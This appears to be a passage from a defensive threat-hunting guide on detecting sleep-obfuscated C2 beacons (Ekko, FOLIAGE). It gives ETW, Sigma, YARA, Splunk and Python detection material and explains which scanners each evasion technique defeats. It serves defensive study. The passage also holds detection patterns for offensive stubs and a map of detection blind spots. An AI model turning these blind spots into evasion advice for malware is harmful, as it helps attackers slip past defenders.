logman create trace SleepObfTrace -p "Microsoft-Windows-Kernel-Memory" 0xFFFF 0xFF -o C:\hunt\vm.etl -ets
// Let run while suspected beacon is active (minimum one full sleep cycle)
logman stop SleepObfTrace -ets

// Parse and look for the protection cycling pattern
// Get-WinEvent needs -Oldest to read .etl files, and exposes the event ID as Id
Get-WinEvent -Path C:\hunt\vm.etl -Oldest |
    Where-Object Id -eq 98 |
    ForEach-Object {
        [PSCustomObject]@{
            Time      = $_.TimeCreated
            PID       = $_.Properties[0].Value
            Address   = "0x{0:X16}" -f [uint64]$_.Properties[1].Value
            Size      = $_.Properties[2].Value
            OldProt   = "0x{0:X}" -f $_.Properties[3].Value
            NewProt   = "0x{0:X}" -f $_.Properties[4].Value
        }
    } |
    Sort-Object PID, Address, Time |
    Export-Csv C:\hunt\prot_changes.csv -NoTypeInformation

// Now find processes with the Ekko cycle (RX->RW->RX) on same address
Import-Csv C:\hunt\prot_changes.csv |
    Group-Object PID, Address |
    Where-Object {
        $transitions = $_.Group | ForEach-Object { "$($_.OldProt)->$($_.NewProt)" }
        ($transitions -contains "0x20->0x4") -and ($transitions -contains "0x4->0x20")
    } |
    Select-Object Name, Count
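
The grouping step above confirms that both transitions occurred on an address, but not that they occurred in order or at a regular interval. The following is a minimal Python sketch of that timing correlation, not a finished detector. The event tuple layout, the function names, and the `min_cycles` and `max_jitter` thresholds are all assumptions for illustration; a beacon configured with heavy sleep jitter would need a looser threshold.

```python
from collections import defaultdict
from statistics import mean, pstdev

PAGE_NOACCESS, PAGE_READWRITE, PAGE_EXECUTE_READ = 0x01, 0x04, 0x20

def find_cycles(events, hidden_prot):
    """Pair each RX -> hidden transition with the next hidden -> RX on the same address.

    events: iterable of (time_seconds, pid, address, old_prot, new_prot) tuples
            (hypothetical layout; adapt to your own export).
    Returns {(pid, address): [time the region was hidden, ...]} for completed cycles.
    """
    cycles = defaultdict(list)
    pending = {}
    for t, pid, addr, old, new in sorted(events):
        key = (pid, addr)
        if old == PAGE_EXECUTE_READ and new == hidden_prot:
            pending[key] = t
        elif old == hidden_prot and new == PAGE_EXECUTE_READ and key in pending:
            cycles[key].append(pending.pop(key))
    return dict(cycles)

def is_periodic(times, min_cycles=3, max_jitter=0.2):
    """True when gaps between cycle starts are regular (stdev / mean <= max_jitter)."""
    if len(times) < min_cycles:
        return False
    gaps = [b - a for a, b in zip(times, times[1:])]
    avg = mean(gaps)
    return avg > 0 and pstdev(gaps) / avg <= max_jitter
```

Calling `find_cycles(events, PAGE_READWRITE)` targets the Ekko pattern and `find_cycles(events, PAGE_NOACCESS)` the FOLIAGE pattern; any key whose times pass `is_periodic` is worth a closer look.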

// Sigma rule for Ekko-style protection cycling
// Requires ETW Microsoft-Windows-Kernel-Memory EventID 98 forwarded to SIEM

title: Ekko Sleep Obfuscation Page Protection Cycling
id: a1b2c3d4-0000-0000-0000-000000000001
status: experimental
description: >
    Selects page protection change events as candidates for the RX->RW->RX cycle
    specific to Ekko-style timer queue sleep obfuscation; the cycle itself is
    confirmed by the correlation described in the notes. Legitimate JIT compilers
    (CLR, V8) may transition RW/RX but will not cycle rapidly on the same address
    at beacon-interval timing.
logsource:
    product: windows
    category: virtual_memory_protection
detection:
    selection:
        EventID: 98
    filter_system:
        ProcessId: 4
    filter_jit:
        Image|endswith:
            - 'dotnet.exe'
            - 'node.exe'
            - 'chrome.exe'
            - 'msedge.exe'
    condition: selection and not filter_system and not filter_jit
falsepositives:
    - JIT compilers such as dotnet and V8 may trigger RW/RX transitions but will
      not cycle to NOACCESS or repeat at consistent beacon-sleep intervals
level: medium
tags:
    - attack.defense_evasion
    - attack.t1027
notes: >
    Correlate on same PID and Address within 60s window.
    Transitions 0x20->0x04 followed by 0x04->0x20 = Ekko signature.
    Transitions 0x20->0x01 followed by 0x01->0x20 = FOLIAGE signature.
    Both patterns repeating at consistent intervals = high confidence beacon.

Detection 3: MalMemDetect and return address validation at API call time

MalMemDetect hooks specific APIs and validates the return address at the moment each API is called. The hook captures the return address using _ReturnAddress(), which yields the address the hooked function will return to in its caller, and passes it to GetModuleHandleExA with GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS. If the return address falls within any loaded module, the function returns TRUE and writes that module's handle to the output parameter. If the address is in private commit memory, the function returns FALSE and the handle is NULL. A failed lookup means the caller is not image-backed code.

// MalMemDetect core detection: return address check at API call time
// Hook installed on RtlAllocateHeap, NtWaitForSingleObject, InternetConnectA

LPVOID WINAPI Hooked_RtlAllocateHeap(PVOID hHeap, ULONG dwFlags, SIZE_T dwBytes) {
    LPVOID result = Original_RtlAllocateHeap(hHeap, dwFlags, dwBytes);

    LPVOID callerReturnAddr = _ReturnAddress();  // Address beacon returns to after this call

    HMODULE hMod = NULL;
    BOOL isImageBacked = GetModuleHandleExA(
        GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
        GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT,
        (LPCSTR)callerReturnAddr,
        &hMod
    );

    if (!isImageBacked || hMod == NULL) {
        // Return address is not inside any loaded module = private commit memory
        // The caller is shellcode
        printf("[ALERT] RtlAllocateHeap from unbacked addr 0x%p | TID %lu | Size %zu\n",
               callerReturnAddr, GetCurrentThreadId(), dwBytes);
    }

    return result;
}

// Real detection output from a CS beacon with Ekko but no at-execution spoofing:
// [ALERT] RtlAllocateHeap from unbacked addr 0x000002C38082B1D0 | TID 12780 | Size 32
// [ALERT] RtlAllocateHeap from unbacked addr 0x000002C383988550 | TID 12780 | Size 27648
// [ALERT] InternetConnectA from unbacked addr 0x000002C38082F344 | TID 12780 | Server: 10.0.0.129
//
// Thread 12780 consistently across all alerts = single beacon thread
// InternetConnectA server = C2 infrastructure pivot point
// Allocation sizes match CS malleable profile heap patterns
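
The triage reasoning in those comments (one thread ID across every alert, the server value as a pivot) can be automated once alerts are collected. This is a small Python sketch that assumes the alert line format shown in the sample output; the regular expression and the `summarize_alerts` helper are hypothetical and not part of MalMemDetect.

```python
import re
from collections import defaultdict

# Matches lines such as:
# [ALERT] InternetConnectA from unbacked addr 0x000002C38082F344 | TID 12780 | Server: 10.0.0.129
ALERT_RE = re.compile(
    r"\[ALERT\] (\w+) from unbacked addr (0x[0-9A-Fa-f]+) \| TID (\d+)(?: \| (.*))?"
)

def summarize_alerts(lines):
    """Group alerts by thread ID: hooked APIs seen, caller addresses, and server values."""
    threads = defaultdict(lambda: {"apis": set(), "callers": set(), "servers": set()})
    for line in lines:
        m = ALERT_RE.search(line)
        if not m:
            continue  # not an alert line
        api, addr, tid, detail = m.groups()
        entry = threads[int(tid)]
        entry["apis"].add(api)
        entry["callers"].add(int(addr, 16))
        if detail and detail.startswith("Server:"):
            entry["servers"].add(detail.split(":", 1)[1].strip())
    return dict(threads)
```

A thread that shows both heap allocation and network alerts from unbacked callers is the strongest candidate for the beacon thread, and its `servers` set gives the infrastructure to pivot on.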

The x64 Return Address Spoofing PoC, as integrated in AceLdr, defeats MalMemDetect for the three APIs MalMemDetect hooks by ensuring the return address visible to the hook points into ntdll via a JMP gadget rather than into the beacon. However, the spoofing covers only the calls that are explicitly wrapped. Any other hooked API the beacon calls without spoofing will expose the real return address. Extending MalMemDetect to hook a wider range of APIs therefore increases coverage against partially spoofed implementations.

Detection 4: Memory attribute scanning and the private commit signal

Even encrypted and non-executable, the beacon’s memory region retains its allocation attributes throughout the sleep cycle. The VAD (Virtual Address Descriptor) entry in the kernel records whether the region is private commit or image commit regardless of its current page permissions. A region that was allocated with VirtualAlloc remains private commit whether it is currently PAGE_EXECUTE_READ, PAGE_READWRITE, or PAGE_NOACCESS. This is the attribute Moneta and PE-sieve look for.

During the Ekko sleep window the beacon region is PAGE_READWRITE with encrypted content, not executable private memory. Moneta looking for executable private memory will not flag it during this exact window. But before sleep starts and after sleep ends, when the beacon is executing, it is executable private memory and Moneta catches it then. Timing a Moneta scan to coincide with the active window rather than the sleep window is the practical approach for detection. During the FOLIAGE sleep window the region is PAGE_NOACCESS. A scanner attempting to read it simply has the read fail, but a private commit region that currently sits at PAGE_NOACCESS is itself an indicator available to tooling with kernel access.

// Moneta: live memory attribute scanning against running processes
// Run elevated; catches executable private commit during beacon active window

Moneta64.exe -m ioc -p [suspected_pid]
// Output to look for:
// [SUSPICIOUS] Private Rx (no mapped file backing)
// Region: 0x0000025300000000 Size: 0x100000 (1 MB)
// Type: MEM_PRIVATE  Protect: PAGE_EXECUTE_READ
// No associated module in PEB loader list

// PE-sieve: can check thread call stacks in addition to memory attributes
pe-sieve64.exe /pid [suspected_pid] /shellc /data 3 /threads
// /shellc enables shellcode heuristic scanning in private regions
// /data 3 always scans non-executable pages too, which covers a region left RW during sleep
// /threads scans thread call stacks, catching return addresses in private commit
// even when the memory is currently encrypted

// Volatility3 post-mortem: VAD analysis on memory dump
python3 vol.py -f memory.raw windows.vadinfo --pid [pid]
// Look for: VadS (private) entries with PAGE_EXECUTE_READ or PAGE_EXECUTE_READWRITE protection
// The VAD keeps the protection requested at allocation time, so the beacon record
// persists regardless of the current page protection state

python3 vol.py -f memory.raw windows.malfind
// Looks for private execute memory with unusual content
// During encrypted sleep: shows high-entropy content in private execute VAD
// Entropy > 7.5 in an executable private region = likely encrypted payload

// Python: entropy check on dumped region
import math
def shannon_entropy(data):
    if not data: return 0.0
    freq = {}
    for b in data:
        freq[b] = freq.get(b, 0) + 1
    total = len(data)
    return -sum((c/total) * math.log2(c/total) for c in freq.values())

with open("dumped_private_exec_region.bin", "rb") as f:
    data = f.read()
print(f"Entropy: {shannon_entropy(data):.4f}")
# Normal code: 5.0 - 6.5
# Encrypted payload: 7.5 - 8.0
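
The attribute and entropy signals described in this section can be combined into one rough classification per region. The sketch below is a hedged illustration rather than how Moneta or PE-sieve work internally: `classify_region`, its labels, and the 7.5 threshold are assumptions. The constants are the standard Windows values for MEM_PRIVATE and the PAGE_* protections. High-entropy RW private memory also occurs legitimately (compressed or encrypted application data), so that label is a lead, not a verdict.

```python
import math
from collections import Counter

MEM_PRIVATE = 0x20000
PAGE_NOACCESS, PAGE_READWRITE = 0x01, 0x04
# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_region(mem_type, protect, data=b"", threshold=7.5):
    """Label a region from its type, current protection, and (optional) content."""
    protect &= 0xFF  # drop modifier bits such as PAGE_GUARD
    if mem_type != MEM_PRIVATE:
        return "backed"                    # image or mapped memory, out of scope here
    if protect in EXECUTABLE:
        return "private-exec"              # active-window beacon candidate
    if protect == PAGE_NOACCESS:
        return "private-noaccess"          # FOLIAGE-style sleep candidate, unreadable
    if protect == PAGE_READWRITE and entropy(data) >= threshold:
        return "private-rw-high-entropy"   # Ekko-style sleep candidate
    return "unremarkable"
```

Feeding it the type, protection, and bytes of each region from a dump gives a quick ordering of which private regions deserve a manual look first.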

YARA rules targeting sleep kit scaffolding rather than beacon content

YARA rules targeting beacon content fail during sleep because the content is encrypted. Rules targeting the sleep kit scaffolding can survive because the scaffolding must be present and functional throughout the sleep cycle. The KsecDD handle in FOLIAGE, the CreateTimerQueueTimer setup code in Ekko, the NtContinue dispatch mechanism, and the x64 return address spoofing stub are all either in image commit memory or must be present in recognizable form to function.

// YARA: target the scaffolding, not the encrypted beacon content

rule FOLIAGE_Sleep_Chain_Scaffolding {
    meta:
        author      = "Threat Hunter"
        description = "Detects FOLIAGE APC-based sleep obfuscation scaffolding"
        reference   = "Austin Hudson FOLIAGE, Kyle Avery DEF CON 30"
    strings:
        $ksecdd_path  = "\\Device\\KsecDD" wide
        $ksecdd_path2 = "\\Device\\KsecDD" ascii
        $apc_thread   = "NtQueueApcThread" ascii
        $ntcontinue   = "NtContinue" ascii
        $nttestalert  = "NtTestAlert" ascii
    condition:
        ($ksecdd_path or $ksecdd_path2) and $apc_thread and $ntcontinue and $nttestalert
}

rule Ekko_Timer_Sleep_Scaffolding {
    meta:
        author      = "Threat Hunter"
        description = "Detects Ekko timer-queue sleep obfuscation scaffolding"
        reference   = "C5pider Ekko, reversed from MDSec NightHawk"
    strings:
        $create_tqt   = "CreateTimerQueueTimer" ascii
        $sf032        = "SystemFunction032" ascii
        $ntcontinue   = "NtContinue" ascii
        $wt_flag      = { 20 00 00 00 00 00 00 00 }
    condition:
        $create_tqt and $sf032 and $ntcontinue and $wt_flag
}

rule x64_ReturnAddr_Spoofing_Stub {
    meta:
        author      = "Threat Hunter"
        description = "At-execution return address spoofing stub from namazso PoC"
        reference   = "Used in AceLdr for MalMemDetect bypass"
    strings:
        $stub_entry = { 41 5B 48 83 C4 08 4C 8B 54 24 18 }
        $fixup_lea  = { 48 8D 1D ?? ?? ?? ?? }
    condition:
        $stub_entry and $fixup_lea
}

Correlating detections: how the layers combine

No single detection layer covers every variant at every point in the sleep cycle. ETW page protection events cover FOLIAGE and Ekko reliably but require a deployed ETW pipeline. Hunt-Sleeping-Beacons catches both via their respective call stack signatures but can be defeated by a correct implementation of at-execution spoofing during the sleep chain. MalMemDetect catches the active execution phase but is defeated by at-execution return address spoofing. Memory attribute scanning catches the execution phase but misses the sleep window for Ekko. YARA covers the scaffolding regardless of sleep state but only when the memory is readable.

The invariant that covers everything is page protection transitions logged by ETW, because it fires in kernel mode on every NtProtectVirtualMemory call and cannot be intercepted or suppressed by any user-mode technique. Any implementation in the Gargoyle lineage must change page protections. Logging those changes, correlating same-process same-address rapid cycling at consistent intervals, and investigating the owning process is the detection that survives the full evasion stack.

// Correlation query: combine ETW page protection events with Sysmon data in Splunk
// Finds processes with page cycling that also appear in Sysmon
// CreateRemoteThread (8) or ProcessAccess (10) events
// Field names (old_prot, new_prot, pid, image_name) depend on how your pipeline normalizes events

index=etw_kernel EventID=98
| eval transition = old_prot . "->" . new_prot
| where transition IN ("32->4","4->32","32->1","1->32")
| bin _time span=60s
| stats
    dc(transition) as unique_transitions,
    values(transition) as transitions,
    values(address) as addresses
    by _time, pid, image_name
| where unique_transitions >= 2
| join pid [
    search index=sysmon (EventCode=8 OR EventCode=10)
    | stats count as thread_events by pid
]
| where thread_events > 0
| eval confidence = case(
    unique_transitions >= 4 AND thread_events > 0, "HIGH",
    unique_transitions >= 2 AND thread_events > 0, "MEDIUM",
    true(), "LOW"
)
| eval rank = case(confidence == "HIGH", 3, confidence == "MEDIUM", 2, true(), 1)
| sort -rank, -_time
| table _time, pid, image_name, confidence, transitions, addresses

The practical triage sequence when ETW flags a process: first, capture a full memory dump with ProcDump before touching anything else. The dump preserves the key material, CONTEXT chain, and scaffolding regardless of whether the beacon is currently active or sleeping. Second, check Hunt-Sleeping-Beacons output against the flagged PID to see which sleep technique is in use and confirm it is the right process. Third, run YARA against the dump to identify the specific implementation and extract C2 configuration. If the beacon is currently encrypted, note the private commit VAD addresses from Moneta, wait for the next active window, and then run strings extraction against those regions to recover C2 infrastructure. The RC4 key for Ekko implementations is in a separate allocation near the beacon code region, persists through the sleep cycle, and can be used to decrypt a dump captured during the sleep window.
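
For the last step, decrypting a region captured during the sleep window, a plain RC4 routine is enough, since SystemFunction032 is an RC4 implementation. The following Python sketch assumes you have already carved the encrypted region and recovered the key bytes from the dump; the file names in the usage comments are hypothetical placeholders.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("key must not be empty")
    # Key-scheduling algorithm
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation, XORed over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

# Usage (hypothetical file names):
#   region = open("beacon_region_sleeping.bin", "rb").read()
#   key    = open("recovered_key.bin", "rb").read()
#   open("beacon_region_decrypted.bin", "wb").write(rc4(key, region))
```

If the key is right, the entropy of the output should drop back toward the range expected for code, and the YARA and strings steps can then be run against the decrypted file.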